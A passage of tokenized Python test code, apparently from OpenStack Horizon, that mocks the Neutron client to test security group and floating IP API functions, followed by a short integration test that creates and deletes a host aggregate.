<NUM_LIT:4> , <EOL> '<STR_LIT>' : fip . floating_ip_address , <EOL> '<STR_LIT>' : p . mac_address , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return addresses <EOL> def _check_server_address ( self , res_server_data , no_fip_expected = False ) : <EOL> expected_addresses = self . _get_expected_addresses ( res_server_data , <EOL> no_fip_expected ) <EOL> self . assertEqual ( len ( expected_addresses ) , <EOL> len ( res_server_data . addresses ) ) <EOL> for net , addresses in expected_addresses . items ( ) : <EOL> self . assertIn ( net , res_server_data . addresses ) <EOL> self . assertEqual ( addresses , res_server_data . addresses [ net ] ) <EOL> def _test_servers_update_addresses ( self , router_enabled = True ) : <EOL> tenant_id = self . request . user . tenant_id <EOL> servers = self . servers . list ( ) <EOL> server_ids = [ server . id for server in servers ] <EOL> server_ports = [ p for p in self . api_ports . 
list ( ) <EOL> if p [ '<STR_LIT>' ] in server_ids ] <EOL> server_port_ids = [ p [ '<STR_LIT:id>' ] for p in server_ports ] <EOL> if router_enabled : <EOL> assoc_fips = [ fip for fip in self . api_q_floating_ips . list ( ) <EOL> if fip [ '<STR_LIT>' ] in server_port_ids ] <EOL> server_network_ids = [ p [ '<STR_LIT>' ] for p in server_ports ] <EOL> server_networks = [ net for net in self . api_networks . list ( ) <EOL> if net [ '<STR_LIT:id>' ] in server_network_ids ] <EOL> self . qclient . list_ports ( device_id = server_ids ) . AndReturn ( { '<STR_LIT>' : server_ports } ) <EOL> if router_enabled : <EOL> self . qclient . list_floatingips ( tenant_id = tenant_id , <EOL> port_id = server_port_ids ) . AndReturn ( { '<STR_LIT>' : assoc_fips } ) <EOL> self . qclient . list_ports ( tenant_id = tenant_id ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . qclient . list_networks ( id = set ( server_network_ids ) ) . AndReturn ( { '<STR_LIT>' : server_networks } ) <EOL> self . qclient . list_subnets ( ) . AndReturn ( { '<STR_LIT>' : self . api_subnets . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . servers_update_addresses ( self . request , servers ) <EOL> self . assertEqual ( self . servers . count ( ) , len ( servers ) ) <EOL> self . assertEqual ( [ server . id for server in self . servers . list ( ) ] , <EOL> [ server . id for server in servers ] ) <EOL> no_fip_expected = not router_enabled <EOL> self . _check_server_address ( servers [ <NUM_LIT:0> ] , no_fip_expected ) <EOL> addrs = servers [ <NUM_LIT:0> ] . addresses [ '<STR_LIT>' ] <EOL> if router_enabled : <EOL> self . assertEqual ( <NUM_LIT:2> , len ( addrs ) ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( addrs ) ) <EOL> self . 
assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _check_server_address ( servers [ <NUM_LIT:1> ] , no_fip_expected ) <EOL> addrs = servers [ <NUM_LIT:1> ] . addresses [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:1> , len ( addrs ) ) <EOL> self . assertEqual ( '<STR_LIT>' , addrs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( servers [ <NUM_LIT:2> ] . addresses ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_servers_update_addresses ( self ) : <EOL> self . _test_servers_update_addresses ( ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : False } ) <EOL> def test_servers_update_addresses_router_disabled ( self ) : <EOL> self . _test_servers_update_addresses ( router_enabled = False ) <EOL> class NetworkApiNeutronSecurityGroupTests ( NetworkApiNeutronTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronSecurityGroupTests , self ) . setUp ( ) <EOL> self . qclient . list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> self . sg_dict = dict ( [ ( sg [ '<STR_LIT:id>' ] , sg [ '<STR_LIT:name>' ] ) for sg <EOL> in self . api_q_secgroups . list ( ) ] ) <EOL> def _cmp_sg_rule ( self , exprule , retrule ) : <EOL> self . assertEqual ( exprule [ '<STR_LIT:id>' ] , retrule . id ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . parent_group_id ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . direction ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . ethertype ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . from_port ) <EOL> self . assertEqual ( exprule [ '<STR_LIT>' ] , <EOL> retrule . 
to_port , ) <EOL> if ( exprule [ '<STR_LIT>' ] is None and <EOL> exprule [ '<STR_LIT>' ] is None ) : <EOL> expcidr = ( '<STR_LIT>' if exprule [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> else '<STR_LIT>' ) <EOL> else : <EOL> expcidr = exprule [ '<STR_LIT>' ] <EOL> self . assertEqual ( expcidr , retrule . ip_range . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( self . sg_dict . get ( exprule [ '<STR_LIT>' ] ) , <EOL> retrule . group . get ( '<STR_LIT:name>' ) ) <EOL> def _cmp_sg ( self , exp_sg , ret_sg ) : <EOL> self . assertEqual ( exp_sg [ '<STR_LIT:id>' ] , ret_sg . id ) <EOL> self . assertEqual ( exp_sg [ '<STR_LIT:name>' ] , ret_sg . name ) <EOL> exp_rules = exp_sg [ '<STR_LIT>' ] <EOL> self . assertEqual ( len ( exp_rules ) , len ( ret_sg . rules ) ) <EOL> for ( exprule , retrule ) in six . moves . zip ( exp_rules , ret_sg . rules ) : <EOL> self . _cmp_sg_rule ( exprule , retrule ) <EOL> def test_security_group_list ( self ) : <EOL> sgs = self . api_q_secgroups . list ( ) <EOL> tenant_id = self . request . user . tenant_id <EOL> self . qclient . list_security_groups ( tenant_id = tenant_id ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( sgs ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . security_group_list ( self . request ) <EOL> self . assertEqual ( len ( sgs ) , len ( rets ) ) <EOL> for ( exp , ret ) in six . moves . zip ( sgs , rets ) : <EOL> self . _cmp_sg ( exp , ret ) <EOL> def test_security_group_get ( self ) : <EOL> secgroup = self . api_q_secgroups . first ( ) <EOL> sg_ids = set ( [ secgroup [ '<STR_LIT:id>' ] ] + <EOL> [ rule [ '<STR_LIT>' ] for rule <EOL> in secgroup [ '<STR_LIT>' ] <EOL> if rule [ '<STR_LIT>' ] ] ) <EOL> related_sgs = [ sg for sg in self . api_q_secgroups . list ( ) <EOL> if sg [ '<STR_LIT:id>' ] in sg_ids ] <EOL> self . qclient . show_security_group ( secgroup [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( secgroup ) } ) <EOL> self . qclient . 
list_security_groups ( id = sg_ids , fields = [ '<STR_LIT:id>' , '<STR_LIT:name>' ] ) . AndReturn ( { '<STR_LIT>' : related_sgs } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_get ( self . request , secgroup [ '<STR_LIT:id>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_create ( self ) : <EOL> secgroup = self . api_q_secgroups . list ( ) [ <NUM_LIT:1> ] <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : secgroup [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : secgroup [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : self . request . user . project_id } } <EOL> self . qclient . create_security_group ( body ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( secgroup ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_create ( self . request , secgroup [ '<STR_LIT:name>' ] , <EOL> secgroup [ '<STR_LIT:description>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_update ( self ) : <EOL> secgroup = self . api_q_secgroups . list ( ) [ <NUM_LIT:1> ] <EOL> secgroup = copy . deepcopy ( secgroup ) <EOL> secgroup [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> secgroup [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : secgroup [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : secgroup [ '<STR_LIT:description>' ] } } <EOL> self . qclient . update_security_group ( secgroup [ '<STR_LIT:id>' ] , body ) . AndReturn ( { '<STR_LIT>' : secgroup } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_update ( self . request , <EOL> secgroup [ '<STR_LIT:id>' ] , <EOL> secgroup [ '<STR_LIT:name>' ] , <EOL> secgroup [ '<STR_LIT:description>' ] ) <EOL> self . _cmp_sg ( secgroup , ret ) <EOL> def test_security_group_delete ( self ) : <EOL> secgroup = self . api_q_secgroups . first ( ) <EOL> self . qclient . delete_security_group ( secgroup [ '<STR_LIT:id>' ] ) <EOL> self . mox . 
ReplayAll ( ) <EOL> api . network . security_group_delete ( self . request , secgroup [ '<STR_LIT:id>' ] ) <EOL> def test_security_group_rule_create ( self ) : <EOL> sg_rule = [ r for r in self . api_q_secgroup_rules . list ( ) <EOL> if r [ '<STR_LIT>' ] == '<STR_LIT>' and r [ '<STR_LIT>' ] ] [ <NUM_LIT:0> ] <EOL> sg_id = sg_rule [ '<STR_LIT>' ] <EOL> secgroup = [ sg for sg in self . api_q_secgroups . list ( ) <EOL> if sg [ '<STR_LIT:id>' ] == sg_id ] [ <NUM_LIT:0> ] <EOL> post_rule = copy . deepcopy ( sg_rule ) <EOL> del post_rule [ '<STR_LIT:id>' ] <EOL> del post_rule [ '<STR_LIT>' ] <EOL> post_body = { '<STR_LIT>' : post_rule } <EOL> self . qclient . create_security_group_rule ( post_body ) . AndReturn ( { '<STR_LIT>' : copy . deepcopy ( sg_rule ) } ) <EOL> self . qclient . list_security_groups ( id = set ( [ sg_id ] ) , <EOL> fields = [ '<STR_LIT:id>' , '<STR_LIT:name>' ] ) . AndReturn ( { '<STR_LIT>' : [ copy . deepcopy ( secgroup ) ] } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . security_group_rule_create ( <EOL> self . request , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] , <EOL> sg_rule [ '<STR_LIT>' ] , sg_rule [ '<STR_LIT>' ] ) <EOL> self . _cmp_sg_rule ( sg_rule , ret ) <EOL> def test_security_group_rule_delete ( self ) : <EOL> sg_rule = self . api_q_secgroup_rules . first ( ) <EOL> self . qclient . delete_security_group_rule ( sg_rule [ '<STR_LIT:id>' ] ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . security_group_rule_delete ( self . request , sg_rule [ '<STR_LIT:id>' ] ) <EOL> def _get_instance ( self , cur_sg_ids ) : <EOL> instance_port = [ p for p in self . api_ports . list ( ) <EOL> if p [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) ] [ <NUM_LIT:0> ] <EOL> instance_id = instance_port [ '<STR_LIT>' ] <EOL> instance_ports = [ ] <EOL> for _i in range ( <NUM_LIT:2> ) : <EOL> p = copy . 
deepcopy ( instance_port ) <EOL> p [ '<STR_LIT:id>' ] = str ( uuid . uuid4 ( ) ) <EOL> p [ '<STR_LIT>' ] = cur_sg_ids <EOL> instance_ports . append ( p ) <EOL> return ( instance_id , instance_ports ) <EOL> def test_server_security_groups ( self ) : <EOL> cur_sg_ids = [ sg [ '<STR_LIT:id>' ] for sg in self . api_q_secgroups . list ( ) [ : <NUM_LIT:2> ] ] <EOL> instance_id , instance_ports = self . _get_instance ( cur_sg_ids ) <EOL> self . qclient . list_ports ( device_id = instance_id ) . AndReturn ( { '<STR_LIT>' : instance_ports } ) <EOL> secgroups = copy . deepcopy ( self . api_q_secgroups . list ( ) ) <EOL> self . qclient . list_security_groups ( id = set ( cur_sg_ids ) ) . AndReturn ( { '<STR_LIT>' : secgroups } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_security_groups ( self . request , instance_id ) <EOL> def test_server_update_security_groups ( self ) : <EOL> cur_sg_ids = [ self . api_q_secgroups . first ( ) [ '<STR_LIT:id>' ] ] <EOL> new_sg_ids = [ sg [ '<STR_LIT:id>' ] for sg in self . api_q_secgroups . list ( ) [ : <NUM_LIT:2> ] ] <EOL> instance_id , instance_ports = self . _get_instance ( cur_sg_ids ) <EOL> self . qclient . list_ports ( device_id = instance_id ) . AndReturn ( { '<STR_LIT>' : instance_ports } ) <EOL> for p in instance_ports : <EOL> body = { '<STR_LIT:port>' : { '<STR_LIT>' : new_sg_ids } } <EOL> self . qclient . update_port ( p [ '<STR_LIT:id>' ] , body = body ) . AndReturn ( { '<STR_LIT:port>' : p } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . server_update_security_groups ( <EOL> self . request , instance_id , new_sg_ids ) <EOL> def test_security_group_backend ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> api . network . security_group_backend ( self . request ) ) <EOL> class NetworkApiNeutronFloatingIpTests ( NetworkApiNeutronTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NetworkApiNeutronFloatingIpTests , self ) . setUp ( ) <EOL> self . qclient . 
list_extensions ( ) . AndReturn ( { '<STR_LIT>' : self . api_extensions . list ( ) } ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_floating_ip_supported ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( api . network . floating_ip_supported ( self . request ) ) <EOL> @ override_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : False } ) <EOL> def test_floating_ip_supported_false ( self ) : <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( api . network . floating_ip_supported ( self . request ) ) <EOL> def test_floating_ip_pools_list ( self ) : <EOL> search_opts = { '<STR_LIT>' : True } <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> self . qclient . list_networks ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : ext_nets } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . floating_ip_pools_list ( self . request ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT:name>' ] : <EOL> self . assertEqual ( [ p [ attr ] for p in ext_nets ] , <EOL> [ getattr ( p , attr ) for p in rets ] ) <EOL> def test_floating_ip_list ( self ) : <EOL> fips = self . api_q_floating_ips . list ( ) <EOL> filters = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> self . qclient . list_floatingips ( ** filters ) . AndReturn ( { '<STR_LIT>' : fips } ) <EOL> self . qclient . list_ports ( ** filters ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . tenant_floating_ip_list ( self . request ) <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . assertEqual ( len ( fips ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . 
assertEqual ( exp [ attr ] , getattr ( ret , attr ) ) <EOL> if exp [ '<STR_LIT>' ] : <EOL> dev_id = assoc_port [ '<STR_LIT>' ] if exp [ '<STR_LIT>' ] else None <EOL> self . assertEqual ( dev_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> else : <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_list_all_tenants ( self ) : <EOL> fips = self . api_q_floating_ips . list ( ) <EOL> self . qclient . list_floatingips ( ) . AndReturn ( { '<STR_LIT>' : fips } ) <EOL> self . qclient . list_ports ( ) . AndReturn ( { '<STR_LIT>' : self . api_ports . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . NetworkClient ( self . request ) <EOL> fip_manager = api . neutron . FloatingIpManager ( self . request ) <EOL> rets = fip_manager . list ( all_tenants = True ) <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . assertEqual ( len ( fips ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , fips ) : <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( getattr ( ret , attr ) , exp [ attr ] ) <EOL> if exp [ '<STR_LIT>' ] : <EOL> dev_id = assoc_port [ '<STR_LIT>' ] if exp [ '<STR_LIT>' ] else None <EOL> self . assertEqual ( dev_id , ret . instance_id ) <EOL> self . assertEqual ( '<STR_LIT>' , ret . instance_type ) <EOL> else : <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def _test_floating_ip_get_associated ( self , assoc_port , exp_instance_type ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> self . qclient . show_floatingip ( fip [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . qclient . show_port ( assoc_port [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT:port>' : assoc_port } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . 
tenant_floating_ip_get ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertEqual ( assoc_port [ '<STR_LIT>' ] , ret . instance_id ) <EOL> self . assertEqual ( exp_instance_type , ret . instance_type ) <EOL> def test_floating_ip_get_associated ( self ) : <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> self . _test_floating_ip_get_associated ( assoc_port , '<STR_LIT>' ) <EOL> def test_floating_ip_get_associated_with_loadbalancer_vip ( self ) : <EOL> assoc_port = copy . deepcopy ( self . api_ports . list ( ) [ <NUM_LIT:1> ] ) <EOL> assoc_port [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assoc_port [ '<STR_LIT>' ] = str ( uuid . uuid4 ( ) ) <EOL> assoc_port [ '<STR_LIT:name>' ] = '<STR_LIT>' + str ( uuid . uuid4 ( ) ) <EOL> self . _test_floating_ip_get_associated ( assoc_port , '<STR_LIT>' ) <EOL> def test_floating_ip_get_unassociated ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:0> ] <EOL> self . qclient . show_floatingip ( fip [ '<STR_LIT:id>' ] ) . AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_get ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_allocate ( self ) : <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> ext_net = ext_nets [ <NUM_LIT:0> ] <EOL> fip = self . api_q_floating_ips . first ( ) <EOL> self . qclient . create_floatingip ( <EOL> { '<STR_LIT>' : { '<STR_LIT>' : ext_net [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : self . request . user . project_id } } ) . 
AndReturn ( { '<STR_LIT>' : fip } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . tenant_floating_ip_allocate ( self . request , <EOL> ext_net [ '<STR_LIT:id>' ] ) <EOL> for attr in [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertEqual ( fip [ attr ] , getattr ( ret , attr ) ) <EOL> self . assertIsNone ( ret . instance_id ) <EOL> self . assertIsNone ( ret . instance_type ) <EOL> def test_floating_ip_release ( self ) : <EOL> fip = self . api_q_floating_ips . first ( ) <EOL> self . qclient . delete_floatingip ( fip [ '<STR_LIT:id>' ] ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . tenant_floating_ip_release ( self . request , fip [ '<STR_LIT:id>' ] ) <EOL> def test_floating_ip_associate ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> assoc_port = self . api_ports . list ( ) [ <NUM_LIT:1> ] <EOL> ip_address = assoc_port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> target_id = '<STR_LIT>' % ( assoc_port [ '<STR_LIT:id>' ] , ip_address ) <EOL> params = { '<STR_LIT>' : assoc_port [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : ip_address } <EOL> self . qclient . update_floatingip ( fip [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : params } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_associate ( self . request , fip [ '<STR_LIT:id>' ] , target_id ) <EOL> def test_floating_ip_disassociate ( self ) : <EOL> fip = self . api_q_floating_ips . list ( ) [ <NUM_LIT:1> ] <EOL> self . qclient . update_floatingip ( fip [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : None } } ) <EOL> self . mox . ReplayAll ( ) <EOL> api . network . floating_ip_disassociate ( self . 
request , fip [ '<STR_LIT:id>' ] ) <EOL> def _get_target_id ( self , port ) : <EOL> param = { '<STR_LIT:id>' : port [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] } <EOL> return '<STR_LIT>' % param <EOL> def _get_target_name ( self , port ) : <EOL> param = { '<STR_LIT>' : port [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : port [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] } <EOL> return '<STR_LIT>' % param <EOL> def _subs_from_port ( self , port ) : <EOL> return [ ip [ '<STR_LIT>' ] for ip in port [ '<STR_LIT>' ] ] <EOL> @ override_settings ( <EOL> OPENSTACK_NEUTRON_NETWORK = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> ) <EOL> def test_floating_ip_target_list ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> subnet_id = self . subnets . first ( ) . id <EOL> shared_nets = [ n for n in self . api_networks . list ( ) if n [ '<STR_LIT>' ] ] <EOL> shared_subnet_ids = [ s for n in shared_nets for s in n [ '<STR_LIT>' ] ] <EOL> target_ports = [ <EOL> ( self . _get_target_id ( p ) , self . _get_target_name ( p ) ) for p in ports <EOL> if ( not p [ '<STR_LIT>' ] . startswith ( '<STR_LIT>' ) and <EOL> ( subnet_id in self . _subs_from_port ( p ) or <EOL> ( set ( shared_subnet_ids ) & set ( self . _subs_from_port ( p ) ) ) ) ) <EOL> ] <EOL> filters = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> self . qclient . list_ports ( ** filters ) . AndReturn ( { '<STR_LIT>' : ports } ) <EOL> servers = self . servers . list ( ) <EOL> novaclient = self . stub_novaclient ( ) <EOL> novaclient . servers = self . mox . CreateMockAnything ( ) <EOL> search_opts = { '<STR_LIT>' : self . request . user . tenant_id } <EOL> novaclient . servers . list ( True , search_opts ) . AndReturn ( servers ) <EOL> search_opts = { '<STR_LIT>' : True } <EOL> ext_nets = [ n for n in self . api_networks . list ( ) <EOL> if n [ '<STR_LIT>' ] ] <EOL> self . qclient . list_networks ( ** search_opts ) . 
AndReturn ( { '<STR_LIT>' : ext_nets } ) <EOL> self . qclient . list_routers ( ) . AndReturn ( { '<STR_LIT>' : <EOL> self . api_routers . list ( ) } ) <EOL> self . qclient . list_networks ( shared = True ) . AndReturn ( { '<STR_LIT>' : <EOL> shared_nets } ) <EOL> shared_subs = [ s for s in self . api_subnets . list ( ) <EOL> if s [ '<STR_LIT:id>' ] in shared_subnet_ids ] <EOL> self . qclient . list_subnets ( ) . AndReturn ( { '<STR_LIT>' : shared_subs } ) <EOL> self . qclient . list_vips ( ) . AndReturn ( { '<STR_LIT>' : self . vips . list ( ) } ) <EOL> self . mox . ReplayAll ( ) <EOL> rets = api . network . floating_ip_target_list ( self . request ) <EOL> self . assertEqual ( len ( target_ports ) , len ( rets ) ) <EOL> for ret , exp in zip ( rets , target_ports ) : <EOL> self . assertEqual ( exp [ <NUM_LIT:0> ] , ret . id ) <EOL> self . assertEqual ( exp [ <NUM_LIT:1> ] , ret . name ) <EOL> def test_floating_ip_target_get_by_instance ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> candidates = [ p for p in ports if p [ '<STR_LIT>' ] == '<STR_LIT:1>' ] <EOL> search_opts = { '<STR_LIT>' : '<STR_LIT:1>' } <EOL> self . qclient . list_ports ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : candidates } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_get_by_instance ( self . request , '<STR_LIT:1>' ) <EOL> self . assertEqual ( self . _get_target_id ( candidates [ <NUM_LIT:0> ] ) , ret ) <EOL> def test_target_floating_ip_port_by_instance ( self ) : <EOL> ports = self . api_ports . list ( ) <EOL> candidates = [ p for p in ports if p [ '<STR_LIT>' ] == '<STR_LIT:1>' ] <EOL> search_opts = { '<STR_LIT>' : '<STR_LIT:1>' } <EOL> self . qclient . list_ports ( ** search_opts ) . AndReturn ( { '<STR_LIT>' : candidates } ) <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_list_by_instance ( self . request , <EOL> '<STR_LIT:1>' ) <EOL> self . assertEqual ( self . 
_get_target_id ( candidates [ <NUM_LIT:0> ] ) , ret [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( candidates ) , len ( ret ) ) <EOL> def test_floating_ip_target_get_by_instance_with_preloaded_target ( self ) : <EOL> target_list = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_get_by_instance ( <EOL> self . request , '<STR_LIT>' , target_list ) <EOL> self . assertEqual ( '<STR_LIT>' , ret ) <EOL> def test_target_floating_ip_port_by_instance_with_preloaded_target ( self ) : <EOL> target_list = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> self . mox . ReplayAll ( ) <EOL> ret = api . network . floating_ip_target_list_by_instance ( <EOL> self . request , '<STR_LIT>' , target_list ) <EOL> self . assertEqual ( [ '<STR_LIT>' , '<STR_LIT>' ] , ret ) </s>
<s> from openstack_dashboard . test . integration_tests import helpers <EOL> from openstack_dashboard . test . integration_tests . regions import messages <EOL> class TestHostAggregates ( helpers . AdminTestCase ) : <EOL> HOST_AGGREGATE_NAME = helpers . gen_random_resource_name ( "<STR_LIT>" ) <EOL> HOST_AGGREGATE_AVAILABILITY_ZONE = "<STR_LIT>" <EOL> def test_host_aggregate_create ( self ) : <EOL> """<STR_LIT>""" <EOL> hostaggregates_page = self . home_pg . go_to_system_hostaggregatespage ( ) <EOL> hostaggregates_page . create_host_aggregate ( <EOL> name = self . HOST_AGGREGATE_NAME , <EOL> availability_zone = self . HOST_AGGREGATE_AVAILABILITY_ZONE ) <EOL> self . assertTrue ( <EOL> hostaggregates_page . find_message_and_dismiss ( messages . SUCCESS ) ) <EOL> self . assertFalse ( hostaggregates_page . find_message_and_dismiss ( <EOL> messages . ERROR ) ) <EOL> self . assertTrue ( hostaggregates_page . is_host_aggregate_present ( <EOL> self . HOST_AGGREGATE_NAME ) ) <EOL> hostaggregates_page . delete_host_aggregate ( self . HOST_AGGREGATE_NAME ) <EOL> self . assertTrue ( <EOL> hostaggregates_page . find_message_and_dismiss ( messages . SUCCESS ) ) <EOL> self . assertFalse ( hostaggregates_page . find_message_and_dismiss ( <EOL> messages . ERROR ) ) <EOL> self . assertFalse ( hostaggregates_page . is_host_aggregate_present ( <EOL> self . HOST_AGGREGATE_NAME ) ) </s>
